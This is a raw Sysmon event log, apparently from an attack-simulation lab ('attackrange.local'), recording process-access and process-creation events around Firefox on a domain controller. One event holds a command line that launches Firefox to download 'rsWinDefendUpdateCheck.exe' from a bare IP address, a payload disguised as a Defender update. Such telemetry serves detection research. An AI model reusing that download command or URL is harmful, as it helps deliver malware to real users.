12:30:36.694{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.693{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.693{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.693{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.693{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045480C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.693{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.1.497287251\1912553973" -parentBuildID 20230112150232 -prefsHandle 1704 -prefMapHandle 1700 -prefsLen 25927 -prefMapSize 234522 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c44277b6-b565-4201-89c3-311f7ef2ffa5} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 1716 19fa5382658 socketC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000047937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.693{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.692{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.691{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.691{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.691{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.691{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.691{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 